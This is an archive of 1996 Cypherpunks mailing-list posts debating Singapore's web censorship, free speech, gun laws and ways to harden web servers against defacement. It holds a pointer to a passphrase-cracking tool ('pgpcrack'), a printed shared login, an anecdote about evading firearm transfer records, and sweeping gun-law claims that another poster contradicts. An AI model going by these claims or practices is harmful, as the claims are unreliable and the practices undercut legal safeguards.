---------:---------:---------:---------:---------:---------:---------:----
Timothy C.
May | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets,
Licensed Ontologist | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."

From markm at voicenet.com Sun Sep 1 22:45:52 1996
From: markm at voicenet.com (Mark M.)
Date: Mon, 2 Sep 1996 13:45:52 +0800
Subject: DON'T Nuke Singapore Back into the Stone Age
In-Reply-To:
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

On Mon, 2 Sep 1996, James Seng wrote:

> Now, what makes you think that citizen of Country A has the power or
> rights to tell politicians of Country B what to do and what they cannot do?
> Just wondering.

I have every right as a citizen of country A to tell politicians of country B what they should or shouldn't do. This isn't about American Ideology; it's about natural rights. Politicians of country B can refuse to listen to me or attempt to prevent my corrupt ideas from polluting the minds of its citizens, but they won't succeed very well with the latter. Of course, politicians may be satisfied with making sure that only the most determined citizens will be able to access information they don't want citizens to access, but as technology progresses, it will become much more difficult to prevent this information from spreading to the masses.

>
> ps: Sorry for the off-topic discussion.

Cpunks is certainly not the best place to be discussing free speech. However, the link between free speech and the spread of cryptographic technology is too close to completely overlook.

- -- Mark

PGP encrypted mail prefered.
Key fingerprint = d61734f2800486ae6f79bfeb70f95348
http://www.voicenet.com/~markm/

From enzo at ima.com Sun Sep 1 23:02:33 1996
From: enzo at ima.com (Enzo Michelangeli)
Date: Mon, 2 Sep 1996 14:02:33 +0800
Subject: DON'T Nuke Singapore Back into the Stone Age
In-Reply-To: <199609020116.UAA01684@manifold.algebra.com>
Message-ID:

On Sun, 1 Sep 1996 ichudov at algebra.com wrote:

> James Seng wrote:
> >
> > On Sat, 31 Aug 1996, Timothy C. May wrote:
> > > The point is to make clear to them that the Usenet and similar Web sites
> > > are global in nature, not subject to censorship without a very high local
> > > cost. If discussions of Lee Kwan Yew's dynasty are considered illegal, then
> > > Singaporeans will have to choose not to carry the various newsgroups into
> > > which *I* post such messages!
> >
> > Just let to add my comment in regard to this unfortunate discussion.
> >
> > To understand the situation better, you should not impose America
> > ideology and perspection on how things to be done to Singapore. Singapore
> > maybe young but there are certain culture too.
> >
> > Most importantly, the move to censor certain WWW site actually comes as a
> > relief to many people, especially parents who worried about the bad
> > influence of it. We can go into the same discussion about whose
> > responsibility it is but before you do that, please bear in mind that this
> > is Singapore.
>
> America is much less different from Singapore in that respect than
> you might think.

Actually, it is.
I've been living in South-East Asia for almost one decade now, and I can tell you that most citizens are more socially conservative than their governments. A few years ago, the Singapore government had to backtrack from a very timid relaxation of rules on soft-porn movies due to the negative reactions from the public. In Singapore, the problem is compounded by the need of preserving good relationships with the even more conservative Malay minority, whose stances have strong backing by the two large neighbours, Malaysia and Indonesia (the case I mentioned had prompted accusations to the government, by members of the opposition Workers Party, of planning the "corruption of the Islamic youth").

Of course, one may argue that the racial, social and religious relations are better handled the American way. That, however, is a controversial issue, and adopting confrontational cowboy attitudes is not going to make the social evolution any faster.

Besides, I don't think that the Singapore government can really believe to be able of blocking access to anything on the net: a while ago I had the occasion of talking with some medium rank officers, and they sounded fully aware of the Internet technology and its implications - and willing to take the plunge. IMHO, the present measures represent more a gesture of appeasement to concerned social conservatives, not differently from the CDA in the US, than an attempt to control the flow of information.

Enzo

From stewarts at ix.netcom.com Sun Sep 1 23:05:56 1996
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Mon, 2 Sep 1996 14:05:56 +0800
Subject: Moscowchannel.com hack
Message-ID: <199609020357.UAA18140@toad.com>

At 01:23 PM 9/1/96 -0400, David Lesher wrote:
>> > Write your web site to a CD-ROM and hard-code the base directory into the
>> > webserver.
>> A hacker who has root can forcibly unmount the cdrom and mount another
>> directory on that node. Not a good solution.
>Real hard disks such as RL02's & RK07's have WRITE DISABLE
>switches....

Many modern SCSI drives have them also, though you may need to connect a switch to the appropriate jumpers. In Hugh Daniel's copious spare time, he's been working on hacking *bsd Unix to cope with a write-protected root drive (you mainly need to set up the swap partition and anything that needs writing in on a separate drive and build lots and lots of symlinks for random logfiles.)

RM05s also let you connect them to two computers, though it was a really bad idea to tell both computers to mount them as writeable, since they'd scribble over the superblocks. (This was more useful before Ethernets became widely supported, since you could blaze away at full MASSBUS and/or disk speed instead of 19.2kbps UUCP.) You can play the same games with SCSI today, if you're careful.

# Thanks; Bill
# Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com
# Reassign Authority!

From nobody at replay.com Sun Sep 1 23:11:03 1996
From: nobody at replay.com (Anonymous)
Date: Mon, 2 Sep 1996 14:11:03 +0800
Subject: [NOISE] Re: FLT 800: From the Rumor Mill...
Message-ID: <199609020352.FAA29463@basement.replay.com>

"Angelos D. Keromytis" writes:
>This has happened before; an Aegis ship in the Persian Gulf shot down
>an Iranian Airlines (or whatever it's called) aircraft; i'm not sure
>how many died in that incident (i think about 70 - can very well be
>wrong). The US just "apologized" for the mistake AFAIK.
>- -Angelos

Well, not quite the same situation. IIRC, the Iranian aircraft refused to respond to challenges. The captain of the Vincennes added that to the info that the Aegis system was giving him, and decided the aircraft was a threat. Turn a key, push a button, and so long, Airbus. (There was also some discussion about whether the Airbus had military IFF gear aboard that may have led the captain to think it was a warplane, but I don't remember if anything came of it.)
The Iranian Airbus was also flying out of what was essentially "hostile" airspace. Despite the massive number of "terrorists" who live here -- at least according to the popular press -- I don't think the Navy has taken the step of declaring CONUS to be a hostile territory. :-)

Feel free to correct my memory if I'm wrong.

From dlv at bwalk.dm.com Sun Sep 1 23:13:19 1996
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 2 Sep 1996 14:13:19 +0800
Subject: Desubscribe
In-Reply-To: <199609011607.JAA22532@dns1.noc.best.net>
Message-ID: <4wsLTD44w165w@bwalk.dm.com>

"James A. Donald" writes:
> > > deserves to be shipped to sweden where they shall be
> > > made into cheese by nuns.
>
> At 04:40 PM 9/1/96 DST, Johnny Eriksson wrote:>
> > No thanks, we do not want them.
>
> You are Swedish?
>
> I heard on talk.politics.guns somebody say that in Sweden they
> had banned knives with a sharp point at the end, and were going
> to ban sharp knives altogether. I think he was just engaging in
> hyperbole, that he really meant that gun control in Sweden was
> unreasonably strict, but on reflection I am not sure.

I heard from a reliable source that the Swedish bikini team opposes GAK.

---
Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps

From jimbell at pacifier.com Sun Sep 1 23:16:09 1996
From: jimbell at pacifier.com (jim bell)
Date: Mon, 2 Sep 1996 14:16:09 +0800
Subject: FLT 800: From the Rumor Mill...But It Makes Sense.. (fwd)
Message-ID: <199609020358.UAA05172@mail.pacifier.com>

At 10:15 PM 9/1/96 -0400, Simon Spero wrote:
>On Sun, 1 Sep 1996, Alan Horowitz wrote:
>
>> The Aegis ship in the Gulf was not in an exercise. It was in a war zone.
>>
>> If my memory serves, the Iranian jetliner had its squawker turned off, or
>> broken. The officer in charge in the CIC had about ten seconds to decide
>> if he was about to be locked-on by a missile.
And no real information to
>
>I think it was actually a combination of a design flaw in the user
>interface for the control system combined with a human error that led to
>the radar officer confusing the airbus with an (F4?) a hundred miles away
>that he'd previously clicked on.

Isn't there just the tiniest bit of a double-standard here? If the ship was supposedly "justified" in firing on an airplane just because it _could_become_ a threat, and _could_ fire a missile at any moment, then why can't we turn this logic around and claim that an Iranian aircraft could view an Aegis as a ship which "could become a threat" and "could fire a missile at any moment."

Generally, I'm not sympathetic to the Iranians; far from it. But I can smell hypocrisy a mile away and the US military's "logic" in this area is unbelievable.

Jim Bell
jimbell at pacifier.com

From enzo at ima.com Sun Sep 1 23:16:18 1996
From: enzo at ima.com (Enzo Michelangeli)
Date: Mon, 2 Sep 1996 14:16:18 +0800
Subject: DON'T Nuke Singapore Back into the Stone Age
In-Reply-To:
Message-ID:

On Sun, 1 Sep 1996, Mark M. wrote:

> I have every right as a citizen of country A to tell politicians of country B
> what they should or shouldn't do. This isn't about American Ideology; it's
> about natural rights.

There are no "natural" rights: a right is the contractual flipside of an obligation, and is only meaningful in the context of a society - which is a thing that evolves continuously.

Enzo (more with Hume and Hayek than with Descartes and Rousseau).

From grafolog at netcom.com Sun Sep 1 23:27:34 1996
From: grafolog at netcom.com (jonathon)
Date: Mon, 2 Sep 1996 14:27:34 +0800
Subject: Bob Dole on Drugs
In-Reply-To: <199609011633.LAA30982@manifold.algebra.com>
Message-ID:

On Sun, 1 Sep 1996, Igor Chudov @ home wrote:

> during which he's expected to propose that the
> military be enlisted to assist in a renewed war on
> drugs.
Question: Since the military, or more specifically, the CIA imports most of the drugs into the US, just which part of the military is going to declare war on which part of the military? Or is all that going to get swept under the rug, so that the ripocrats can further enslave the american population?

xan

jonathon
grafolog at netcom.com

However, if you're tired of the Lesser of N evils, Cthulu's export policy is that you can't escape anyway, and your puny mortal lives will be absorbed along with his morning coffee. Your encryption technology is futile against the Elder Gods, and the arcane formulas in the Cyphernomicon of that mad physicist Tim The Enchanter may summon spirits from the vasty deep, but no secrets are safe from Nyarla-S-Ahothep who knows all and sees all.
Bill Stewart

From grafolog at netcom.com Sun Sep 1 23:32:52 1996
From: grafolog at netcom.com (jonathon)
Date: Mon, 2 Sep 1996 14:32:52 +0800
Subject: Sen. Leahy's "impeccable cyberspace credentials"
In-Reply-To: <199609012034.NAA11901@dns1.noc.best.net>
Message-ID:

On Sun, 1 Sep 1996, James A. Donald wrote:

> > I agree with what you are saying but not all politicians are that bad.
> > You make it sound as if there are no politicians are for freedom of the
> > net.
> So who is the exception?

Harry Browne
Libertarian Party Candidate.

xan

jonathon
grafolog at netcom.com

However, if you're tired of the Lesser of N evils, Cthulu's export policy is that you can't escape anyway, and your puny mortal lives will be absorbed along with his morning coffee. Your encryption technology is futile against the Elder Gods, and the arcane formulas in the Cyphernomicon of that mad physicist Tim The Enchanter may summon spirits from the vasty deep, but no secrets are safe from Nyarla-S-Ahothep who knows all and sees all.
Bill Stewart

From ichudov at algebra.com Sun Sep 1 23:33:32 1996
From: ichudov at algebra.com (Igor Chudov @ home)
Date: Mon, 2 Sep 1996 14:33:32 +0800
Subject: DON'T Nuke Singapore Back into the Stone Age
In-Reply-To:
Message-ID: <199609020417.XAA03139@manifold.algebra.com>

Enzo Michelangeli wrote:
> On Sun, 1 Sep 1996 ichudov at algebra.com wrote:
> > James Seng wrote:
> > > Most importantly, the move to censor certain WWW site actually comes as a
> > > relief to many people, especially parents who worried about the bad
> > > influence of it. We can go into the same discussion about whose
> > > responsibility it is but before you do that, please bear in mind that this
> > > is Singapore.
> >
> > America is much less different from Singapore in that respect than
> > you might think.
>
> Actually, it is. I've been living in South-East Asia for almost one
> decade now, and I can tell you that most citizens are more socially
> conservative than their governments.

... snippity snip ...

> IMHO, the present measures [in Singapore]
> represent more a gesture of appeasement to concerned social conservatives,
> not differently from the CDA in the US, than an attempt to control the
> flow of information.

Ummm, sounds pretty close to what we have here...

- Igor.

From tcmay at got.net Sun Sep 1 23:39:54 1996
From: tcmay at got.net (Timothy C. May)
Date: Mon, 2 Sep 1996 14:39:54 +0800
Subject: Free Speech and List Topics
Message-ID:

At 3:19 AM 9/2/96, Mark M. wrote:
>On Mon, 2 Sep 1996, James Seng wrote:
>> ps: Sorry for the off-topic discussion.
>
>Cpunks is certainly not the best place to be discussing free speech. However,
>the link between free speech and the spread of cryptographic technology is too
>close to completely overlook.

I think it is as good a place as any to discuss free speech. The issues surrounding Net censorship, Singapore, the CDA, Germany, the shutdown of Julf's server, etc., are central to our concerns.
And, in fact, it is "cypherpunk technology" which will have a more lasting effect on these issues than mere talking about it in some "free speech discussion group" will have. More disturbing to me recently has been the steady increase in subscribers to this list who don't seem to value free speech very highly, who write of their own nation's censorship as valiant efforts to protect citizen-units from foreign devils, and, even more shockingly, from supposed defenders of electronic freedom who are now talking about the need for limits on anonymity. With friends like those... --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Licensed Ontologist | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From webmaster at online.barrons.com Sun Sep 1 23:40:34 1996 From: webmaster at online.barrons.com (webmaster at online.barrons.com) Date: Mon, 2 Sep 1996 14:40:34 +0800 Subject: Your password for BARRON'S Online Message-ID: <199609020420.AAA10320@online.barrons.com> Thank you for registering with BARRON'S Online! THE USER NAME YOU HAVE CHOSEN IS cypherpunks THE PASSWORD YOU HAVE CHOSEN IS cypherpunk Please remember that your user name and password are case-sensitive (i.e. Bsmith is different than bsmith) and you should enter them as shown above. Your user name is required in its exact form each time you want to use registered areas on our site (including the exact upper/lowercase combination). The same restriction applies to your password. Your user name and password will allow you to access all of the features of BARRON'S Online. 
The rest of this message contains information about using your password and user name on BARRON'S Online. You may find it helpful to save this message for future reference. WHAT HAPPENS NOW? 1. Return to BARRON'S Online (www.barrons.com). You can use your password and user name to log in to any part of the site that requires registration (such as the Table of Contents, this week's stories, Dossiers and Market Day, and so on). The first time you go to one of these parts of BARRON'S Online, you will be prompted to enter your user name and password. 2. If you ever forget your password, or need any registration-related information, just click on the REGISTER button from the BARRON'S Online gateway page to find the help you need. Welcome to BARRON'S Online... we look forward to seeing you again and again! BARRON'S Online Customer Service barrons-support at www.barrons.com From qut at netcom.com Sun Sep 1 23:52:15 1996 From: qut at netcom.com (Dave Harman OBC) Date: Mon, 2 Sep 1996 14:52:15 +0800 Subject: Silenced Machine Guns Are Safer Than TWA Message-ID: <199609020433.VAA29977@netcom.netcom.com> ! "James A. Donald" , writes: ! >I heard on talk.politics.guns somebody say that in Sweden they ! >had banned knives with a sharp point at the end, and were going ! >to ban sharp knives altogether. I think he was just engaging in ! >hyperbole, that he really meant that gun control in Sweden was ! >unreasonably strict, but on reflection I am not sure. ! > ! ! In a survey conducted in Sweden a few years ago, 50% of Swedish ! households had access to guns (generally military service weapons ! and sporting shotguns). Guns are, however, licensed and regulated, ! and seldom used in crimes. Licenses for "personal protection" are ! almost unobtainable. At least one military officer was court martialed ! when his service revolver was stolen from his automobile. ! ! The most significant "mass murderer" crimes in Sweden (one last ! 
year and one in the 1970's) were caused by people who used their ! legally-obtained military weapons. Hundreds of thousands of private American citizens legally own machine guns, silencers, live hand grenades, .75 caliber machine guns, etc. Perhaps 40% or so of the populace lives in an area without significantly higher regulations concerning such than the federal, which is not that bad. There is no federal law making silenced machine guns substantially more difficult to purchase and shoot than ordinary handguns. The feds certainly don't require training or any other similar requirement. Contrary to popular fiction, ALL firearms have been permanently registered since the 1968 Gun Control Act. The media monopoly lies when they say the contrary. How many firearm crimes were committed by these hundreds of thousands of ordinary untrained destructive weapon owners with their destructive weapons in the entire span of 1980-1996? *NONE*! THEREFORE, everyone in Sweden and America should be allowed to own silenced machine guns without any greater than the usual restrictions. BTW, I muse that the issue of guns, drugs and censorship make an excellent litmus test for libertarians: either you support the legalization of, all of, or your a fake. From grafolog at netcom.com Mon Sep 2 00:03:16 1996 From: grafolog at netcom.com (jonathon) Date: Mon, 2 Sep 1996 15:03:16 +0800 Subject: DON'T Nuke Singapore Back into the Stone Age In-Reply-To: Message-ID: On Mon, 2 Sep 1996, James Seng wrote: > Most importantly, the move to censor certain WWW site actually comes as a > relieve to many people, especially parents who worried about the bad And it is a pain for people whodevelop websites. To avoid offending those who are easilly offended, I either have to put up a stupid << and very misleading warning label >> or block them out. My solution is to put up the misleading, and incredibly stupid "warning" label. 
<< Stupid & misleading, because although my pages do violate the CDA, and most other countries' statutes on what is acceptable content, the same text, if written would not even be given a second glance -- except maybe by the humint part of that country, who would use it for training purposes. >>

> for artistic which rules out soft-porn. It may be surprising but many
> people (in Singapore) do welcome censorship sad to say.

And what will happen to Singapore when "their beloved leader" dies, especially if a result of an assassination?

> passive manner. They _do not_ read every issue of every magazine available
> in Singapore. They only do so when there is enough complaints. For example,

IOW, the newspapers, etc have to either not print stories that may cause complaints, or print them, and go to jail. Censorship at its most vicious, and the most destructive of both the society it tries to appease, and the individual who doesn't conform to its sheer stupidity.

> One more point. They know it is impossible to censor everything. It is

And passing laws that are unenforceable, is simply another way to ensure that laws in general are ignored, which leads to the increased instability of the regime, which leads to the precise opposite effect of what usually is intended.

xan jonathon grafolog at netcom.com

From qut at netcom.com Mon Sep 2 00:18:23 1996
From: qut at netcom.com (Dave Harman OBC)
Date: Mon, 2 Sep 1996 15:18:23 +0800
Subject: http://infinity.nus.sg/cypherpunks/
Message-ID: <199609020450.VAA02140@netcom.netcom.com>

Someone keeps asking for the filtered cypherpunks archive: http://infinity.nus.sg/cypherpunks/ It's filtered with hypermail and is lynx friendly. It's easiest to read by choosing the link to filter by subject.

From Adamsc at io-online.com Mon Sep 2 00:24:20 1996
From: Adamsc at io-online.com (Adamsc)
Date: Mon, 2 Sep 1996 15:24:20 +0800
Subject: WARNING vIRuS!
Message-ID: <19960902051255234.AAA172@IO-ONLINE.COM> On Sat, 31 Aug 1996 23:41:58 -0700, Alan Olsen wrote: >> There is a new and VERY dangerous virus called the HAZ-MAT virus! >This is the clueless kind of crap I expect pitched to AOL users and upper >level management. >The only way that you could obtain the effects described above is with Black >Magic and/or Voodoo. (And not even then.) > >I remember a similar hoax going around about 3-4 years ago about viruses in >image files. I guess nothing on the net is ever forgotten entirely. >Especially the urban legends and bullshit. You ever notice how that is? People *never* remember things like "You have to execute something to get a virus". They *always* remember something like "Good Times." Reminds me of the guy who said you could stick all sorts of sensitive data in README.TXT because you can be sure nobody will look in there. - "'Anonymity is bad,' says a source who wishes to remain anonymous." - Nuff' said. * Home: Chris Adams | http://www.io-online.com/adamsc/adamsc.htp * Autoresponder: send email w/subject of "send resume" or "send PGPKEY" * Work: cadams at acucobol.com | V.M. (619)515-4894 | (619)689-6579 * Member in good standing of the GNU whirled hors d'oeuvre From markm at voicenet.com Mon Sep 2 00:42:14 1996 From: markm at voicenet.com (Mark M.) Date: Mon, 2 Sep 1996 15:42:14 +0800 Subject: PGPCrack for DOS Message-ID: -----BEGIN PGP SIGNED MESSAGE----- There is now a DOS version of pgpcrack. It's available at http://www.voicenet.com/~markm/pgpcrack.html. - -- Mark PGP encrypted mail prefered. 
Key fingerprint = d61734f2800486ae6f79bfeb70f95348 http://www.voicenet.com/~markm/ -----BEGIN PGP SIGNATURE----- Version: 2.6.3 Charset: noconv -----END PGP SIGNATURE----- From Adamsc at io-online.com Mon Sep 2 00:56:55 1996 From: Adamsc at io-online.com (Adamsc) Date: Mon, 2 Sep 1996 15:56:55 +0800 Subject: hackers texts Message-ID: <19960902051749062.AAA212@IO-ONLINE.COM> On Sun, 01 Sep 1996 08:51:36 EDT, patrick b cummings wrote: >If any of you hackers out their have wrote any texts for beginning >hackers or know of any please send them to me at patrickc at juno.com You know, I think his mail server has a 36 hour delay on incoming messages. Either that or he's Roadkill on the Information Superhighway // \\ // \\ ______________ // \\ | | // \\ | Information | // \\ | Superhighway | // ____ \\ | 56MB/s | // /____\ \\ |______________| // |==__==| \\ | | // ~||~~||~ \\ | | // ' \\ | | // // \\ | | // \\ | | // / / \\ | | // \\ | | // /// \\ | | // \\ | | // . ,& \\ | | // . `;//* IS HERE \\ // . `|/^\@'< ' . | \\ // `_/x@=%$P/,', <---/ \\ // >@#)*?o$%( , \\ // \.X#j~\===B \\ / \\ : The Clue truck got him... [In case you haven't noticed yet, this looks best with a non-proportional font] - "'Anonymity is bad,' says a source who wishes to remain anonymous." - Nuff' said. * Home: Chris Adams | http://www.io-online.com/adamsc/adamsc.htp * Autoresponder: send email w/subject of "send resume" or "send PGPKEY" * Work: cadams at acucobol.com | V.M.
(619)515-4894 | (619)689-6579 * Member in good standing of the GNU whirled hors d'oeuvre From Adamsc at io-online.com Mon Sep 2 01:07:08 1996 From: Adamsc at io-online.com (Adamsc) Date: Mon, 2 Sep 1996 16:07:08 +0800 Subject: Moscowchannel.com hack Message-ID: <19960902051921875.AAA201@IO-ONLINE.COM> On Sun, 1 Sep 1996 10:09:32 -0500 (CDT), Igor Chudov @ home wrote: >> > Not really crypto, but related to the DOJ hack in a way. >> > >> > Moscow Channel is a pretty slick, Russian news/commentary >>page. Their Web >> > site was hacked and altered by someone who didn't seem to >>like Russians all >> > Just a matter of time before some builds a dedicated Satan >>type tool that >> > scans for HTTP server holes or messed up file permissions >>to make locating >> > potential victims easy. >> Write your web site to a CD-ROM and hard-code the base >>directory into the >> webserver. > >A hacker who has root can forcibly unmount the cdrom and mount >another >directory on that node. Not a good solution. Hack your system kernel to only allow mounting read-only media to that point. Most hackers wouldn't try "hot-patching" the system kernel. The ones that can probably have better things to do than hack your page. - "'Anonymity is bad,' says a source who wishes to remain anonymous." - Nuff' said. * Home: Chris Adams | http://www.io-online.com/adamsc/adamsc.htp * Autoresponder: send email w/subject of "send resume" or "send PGPKEY" * Work: cadams at acucobol.com | V.M. (619)515-4894 | (619)689-6579 * Member in good standing of the GNU whirled hors d'oeuvre From qut at netcom.com Mon Sep 2 01:07:36 1996 From: qut at netcom.com (Dave Harman OBC) Date: Mon, 2 Sep 1996 16:07:36 +0800 Subject: Free Speech and List Topics In-Reply-To: Message-ID: <199609020517.WAA06504@netcom.netcom.com> ! At 3:19 AM 9/2/96, Mark M. wrote: ! ! >On Mon, 2 Sep 1996, James Seng wrote: ! ! >> ps: Sorry for the off-topic discussion. ! > ! >Cpunks is certainly not the best place to be discussing free speech. 
However, ! >the link between free speech and the spread of cryptographic technology is too ! >close to completely overlook. ! ! I think it is as good a place as any to discuss free speech. The issues ! surrounding Net censorship, Singapore, the CDA, Germany, the shutdown of ! Julf's server, etc., are central to our concerns. ! ! And, in fact, it is "cypherpunk technology" which will have a more lasting ! effect on these issues than mere talking about it in some "free speech ! discussion group" will have. ! ! More disturbing to me recently has been the steady increase in subscribers ! to this list who don't seem to value free speech very highly, who write of ! their own nation's censorship as valiant efforts to protect citizen-units ! from foreign devils, and, even more shockingly, from supposed defenders of ! electronic freedom who are now talking about the need for limits on ! anonymity. How about supporting the effort for comp.cypherpunks ? About the need for limits for anonymity, guess what brought that on? Crime? Yes! The crime of the media monopoly violating the anti-trust acts, because people are ignorant enough to trust the mass media for their news. From Adamsc at io-online.com Mon Sep 2 01:12:40 1996 From: Adamsc at io-online.com (Adamsc) Date: Mon, 2 Sep 1996 16:12:40 +0800 Subject: Bob Dole on Drugs Message-ID: <19960902052400296.AAA43@IO-ONLINE.COM> On Sun, 1 Sep 1996 11:33:02 -0500 (CDT), Igor Chudov @ home wrote: >http://allpolitics.com/news/9608/31/radio.addresses/ > >... snip ... > > Dole, who returned to Washington for Labor Day > weekend, also pledged to use the White House as a > bully pulpit to promote the "moral message" > against drugs and to criticize what he called the > entertainment industry's glamorization of drug use. > > On Sunday, he is to address the convention of the > National Guard Association of the United States > during which he's expected to propose that the > military be enlisted to assist in a renewed war on > drugs. 
This actually makes a lot of sense; if you've decided on an all-out war on drugs, doing it right is *much* better than some sort of weenie effort like we've got. I liked Robert Heinlein on immigration "If we're going to stop immigration build a Berlin style wall complete with alligators in the moat. Otherwise give up the pretense; nothing is more expensive or less useful than a wall that isn't." (very loosely paraphrased) - "'Anonymity is bad,' says a source who wishes to remain anonymous." - Nuff' said. * Home: Chris Adams | http://www.io-online.com/adamsc/adamsc.htp * Autoresponder: send email w/subject of "send resume" or "send PGPKEY" * Work: cadams at acucobol.com | V.M. (619)515-4894 | (619)689-6579 * Member in good standing of the GNU whirled hors d'oeuvre From tcmay at got.net Mon Sep 2 01:14:55 1996 From: tcmay at got.net (Timothy C. May) Date: Mon, 2 Sep 1996 16:14:55 +0800 Subject: Silenced Machine Guns Are Safer Than TWA Message-ID: At 4:33 AM 9/2/96, Skippy wrote: >Contrary to popular fiction, ALL firearms have been permanently >registered since the 1968 Gun Control Act. The media monopoly lies when >they say the contrary. Nope. Gun sales between individuals without any paperwork were fully legal in some places until recently (and may still be fully legal...I can only speak of California). >From 1974 until a couple of years ago, I bought and sold a dozen or more rifles, handguns, and even Evil Assault Weapons, mostly through fully legal gun shows. I even sold a .357 Smith to some guy, made a joke about how great these gun shows were and how great it was to be able to just take cash and hand over a gun without any paperwork...the guy laughed and said he was a San Jose cop. I felt nervous for a few seconds, but quickly realized there was no law *I* was breaking, so I laughed too. Most of these guns I kept no records on, nor did any laws say I had to. 
(A few years ago it became necessary for even private citizen-units to obtain the proper firearms transfer papers from the gubment. I wanted to sell a laser-equipped Heckler & Koch SP-89 without creating a paper trail (as I'd not had one when I acquired the piece a few years earlier), so a friend of mine used his friendly neighborhood libertarian FFL dealer, who has a policy that the stack of transfer forms he is required to keep on file will mysteriously burn up if the Feds ever seek out his records. (Who knows if he'll abide by this policy, but the point is that there are literally tens of thousands of these "kitchen table FFL dealers," and no computerized filing of records. This is one reason I quit the NRA: they are advocating the "instant check." Such an instant check would mean massive computerization of all files, and of course cross-referencing to files on citizens. This would be much worse than the "paper chaos" of stacks of firearms paperwork sitting in dusty filing cabinets. I'll take a 10-day ineffectual waiting period to a Big Brother database of all purchasers.) >BTW, I muse that the issue of guns, drugs and censorship make an >excellent litmus test for libertarians: either you support the >legalization of, all of, or your a fake. I'm not sure what the "legalization of censorship" would mean, though I support the right of anyone to screen out what they choose not to read or view. And I support the right of companies to decide what materials to buy, have viewed by employees, etc. (So if the "Valley Lesbigays" want to show a tape at Hewlett-Packard, H-P can just say "Nope--we're not interested.) I fully support legalization of all drugs, all guns, and am unalterably opposed to any form of government censorship. Does this mean I pass or flunk the litmus test? (He said acidly.) --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. 
May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Licensed Ontologist | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From bobs at ns.net Mon Sep 2 01:18:25 1996 From: bobs at ns.net (Cyber Thrill) Date: Mon, 2 Sep 1996 16:18:25 +0800 Subject: desubscribe Message-ID: <199609020550.WAA06206@tomcat.ns.net> desubscribe From Adamsc at io-online.com Mon Sep 2 01:18:42 1996 From: Adamsc at io-online.com (Adamsc) Date: Mon, 2 Sep 1996 16:18:42 +0800 Subject: Moscowchannel.com hack Message-ID: <19960902052808718.AAA203@IO-ONLINE.COM> On Sun, 1 Sep 1996 12:22:40 -0500 (CDT), Igor Chudov @ home wrote: >> > > Write your web site to a CD-ROM and hard-code the base directory into the >> > > webserver. >> > >> > A hacker who has root can forcibly unmount the cdrom and mount another >> > directory on that node. Not a good solution. >> >> Real hard disks such as RL02's & RK07's have WRITE DISABLE >> switches.... >> > >You can't mount the whole Unix read-only, so there will always be a place >to put the hacked web page, and then mount that place over DocumentRoot. If you had enough RAM in the machine, you could disable swapping, send all log files to /dev/nul (or /dev/lp0), run *only* a web server or anything else that can avoid writing to disk (probably no CGI, etc). It wouldn't be too interesting, but then you probably don't want much happening on your web server anyway. You could even wire that write-disable switch or jumper into a keyswitch on the main console. - "'Anonymity is bad,' says a source who wishes to remain anonymous." - Nuff' said. * Home: Chris Adams | http://www.io-online.com/adamsc/adamsc.htp * Autoresponder: send email w/subject of "send resume" or "send PGPKEY" * Work: cadams at acucobol.com | V.M. 
(619)515-4894 | (619)689-6579 * Member in good standing of the GNU whirled hors d'oeuvre From tcmay at got.net Mon Sep 2 02:01:13 1996 From: tcmay at got.net (Timothy C. May) Date: Mon, 2 Sep 1996 17:01:13 +0800 Subject: Free Speech and List Topics Message-ID: At 5:17 AM 9/2/96, qut wrote: >About the need for limits for anonymity, guess what brought that on? >Crime? Yes! The crime of the media monopoly violating the anti-trust >acts, because people are ignorant enough to trust the mass media for >their news. No self-respecting Cypherpunk thinks the Antitrust Act and related acts are worthy of enforcement. (Think of how the technology we support will tend to allow new avenues for price collusion, interlocking directorates, new forms of business combines, unreadable secure communications with foreign competitors, and so on, all things the Antitrust regulators are already growing worried about.) --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Licensed Ontologist | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From stewarts at ix.netcom.com Mon Sep 2 02:01:46 1996 From: stewarts at ix.netcom.com (Bill Stewart) Date: Mon, 2 Sep 1996 17:01:46 +0800 Subject: Encourage Singapore To Come Out Of the Stone Age Message-ID: <199609020630.XAA20578@toad.com> At 07:06 AM 9/2/96 +0800, James Seng wrote: >Just let to add my comment in regard to this unforuntate discusssion. >To understand the sitution better, you should not impose America >idealogy and perspection on how things to be done to Singapore. >Singapore maybe young but there are certain culture too. 
While Tim's article title was clearly intended to be provocative, I think the most unfortunate thing about this discussion is that we need to have it at all. Any government, or any individual thug, that would impose violence on people for saying things that would bring it into disrespect deserves no respect at all. Any government that claims to have the god-like wisdom to dictate what's best for its subjects to hear or what religious ideas to believe doesn't deserve to be listened to, much less obeyed. If Singapore's government and religious leaders want to say "Our ideas are better than American ideas", and you or I or your neighbor want to listen to them, fine; maybe some of their ideas are better than some of the many ideas floating around North America. But if you or I or your neighbor want to listen to competing ideas, and even to believe and talk about competing ideas, neither you nor the government have the right to stop them - only to refute them with better ideas. People like Tim and I aren't upset only because we believe that we know better than you and Lee Kwan Yew how to run Singapore; free speech is often threatened here in the US and especially Canada. You mentioned movie ratings - they were invented here partly to avoid 